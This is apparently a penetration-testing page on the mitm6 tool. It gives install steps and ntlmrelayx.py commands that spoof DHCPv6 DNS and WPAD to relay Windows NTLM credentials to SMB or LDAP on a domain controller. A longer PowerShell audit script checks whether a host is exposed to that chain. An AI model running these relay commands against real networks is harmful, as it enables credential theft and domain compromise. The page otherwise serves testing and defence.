
mitm6

Installation

$ git clone https://github.com/fox-it/mitm6.git

$ cd mitm6

$ pip install .

$ mitm6 -d <domain>

USE WITH NTLMRELAYX

Notice the IPv6 address being handed out as a DNS server. The real vulnerability is that Windows prefers IPv6 over IPv4, meaning I now control DNS. We then leverage that control of DNS by spoofing WPAD answers again, this time via ntlmrelayx.py. I wrote a guide on how to set it up here. With mitm6 running in one window, open another and run ntlmrelayx.py.

$ ntlmrelayx.py -wh <Attacker IP> -t smb://<Domain Controller>/

OR

$ ntlmrelayx.py -t ldap://<IP of DC>/

-wh: Server hosting WPAD file (Attacker’s IP)

-t: Target (You cannot relay credentials to the same device that you’re spoofing)

With the second command, ntlmrelayx can dump loot that can be used to fire up BloodHound!
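The chain above only works when the victim host prefers an IPv6 DNS server, still auto-discovers a proxy via WPAD, and talks to a target that accepts unsigned SMB or LDAP sessions. The following PowerShell audit is an added example for defenders, not code from the mitm6 project or from this page; it reports those settings on a Windows host or domain controller. The registry paths and value names are the documented Windows ones; the function name Test-Mitm6Exposure and the firewall rule display name it looks for are assumptions of this example.

```powershell
# Added defensive audit (not part of mitm6 or this page): reports the host
# settings that decide whether the mitm6 + ntlmrelayx chain works against it.
# Function name and the firewall rule name are assumptions of this example.
function Test-Mitm6Exposure {
    [CmdletBinding()]
    param()

    $findings = @()

    # Small helper: read one registry value, or $null if key/value is absent.
    function Get-RegValue($Path, $Name) {
        try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
        catch { $null }
    }

    # 1. IPv6 preference. DisabledComponents bit 0x20 makes Windows prefer IPv4
    #    in its prefix policy; 0xFF disables IPv6 on everything but loopback.
    #    Unset means the default: IPv6 preferred, so a rogue DHCPv6 DNS wins.
    $v6 = Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters' 'DisabledComponents'
    $findings += [pscustomobject]@{
        Check   = 'IPv6 preferred over IPv4 (rogue DHCPv6 DNS server would win)'
        Exposed = (($v6 -band 0x20) -eq 0)
        Current = if ($null -eq $v6) { 'not set (IPv6 preferred)' } else { '0x{0:X}' -f $v6 }
    }

    # 2. WPAD auto-discovery. The WinHTTP Web Proxy Auto-Discovery service is
    #    what fetches the WPAD file that ntlmrelayx -wh serves.
    $wpad = Get-Service -Name WinHttpAutoProxySvc -ErrorAction SilentlyContinue
    $findings += [pscustomobject]@{
        Check   = 'WPAD auto-discovery service running'
        Exposed = ($null -ne $wpad) -and ($wpad.Status -eq 'Running')
        Current = if ($wpad) { "$($wpad.Status) / $($wpad.StartType)" } else { 'service not present' }
    }

    # 3. SMB server signing. RequireSecuritySignature=1 means a relayed NTLM
    #    authentication to smb:// cannot be used to open a session here.
    $smb = Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters' 'RequireSecuritySignature'
    $findings += [pscustomobject]@{
        Check   = 'SMB server signing not required'
        Exposed = ($smb -ne 1)
        Current = if ($null -eq $smb) { 'not set' } else { $smb }
    }

    # 4. LDAP signing and channel binding (only present on a domain controller).
    #    LDAPServerIntegrity=2 requires signing; LdapEnforceChannelBinding=2
    #    always enforces channel binding. Together they break ldap:// relays.
    $ntds = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
    if (Test-Path $ntds) {
        $sign = Get-RegValue $ntds 'LDAPServerIntegrity'
        $cbt  = Get-RegValue $ntds 'LdapEnforceChannelBinding'
        $findings += [pscustomobject]@{
            Check   = 'LDAP signing not required on this DC'
            Exposed = ($sign -ne 2)
            Current = if ($null -eq $sign) { 'not set' } else { $sign }
        }
        $findings += [pscustomobject]@{
            Check   = 'LDAP channel binding not enforced on this DC'
            Exposed = ($cbt -ne 2)
            Current = if ($null -eq $cbt) { 'not set' } else { $cbt }
        }
    }

    # 5. Host firewall rule dropping inbound DHCPv6 replies (UDP 546) on
    #    networks with no legitimate DHCPv6 server. Rule name is an assumption.
    $fw = Get-NetFirewallRule -DisplayName 'Block DHCPv6 client inbound' -ErrorAction SilentlyContinue
    $findings += [pscustomobject]@{
        Check   = 'No firewall rule blocking inbound DHCPv6 (UDP 546)'
        Exposed = ($null -eq $fw) -or ($fw.Enabled -ne 'True')
        Current = if ($fw) { "present, Enabled=$($fw.Enabled)" } else { 'absent' }
    }

    return $findings
}

# Run from an elevated PowerShell prompt; every row with Exposed=True is a
# precondition of the attack chain that is still satisfied on this host.
Test-Mitm6Exposure | Format-Table -AutoSize
```

Run it on a sample workstation and on a domain controller: rows 1, 2 and 5 describe the victim side (whether mitm6 can become its DNS server and whether WPAD will be requested at all), while rows 3 and 4 describe the relay target side (whether the relayed authentication is accepted by smb:// or ldap://). Both sides have to be exposed for the commands on this page to yield loot.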
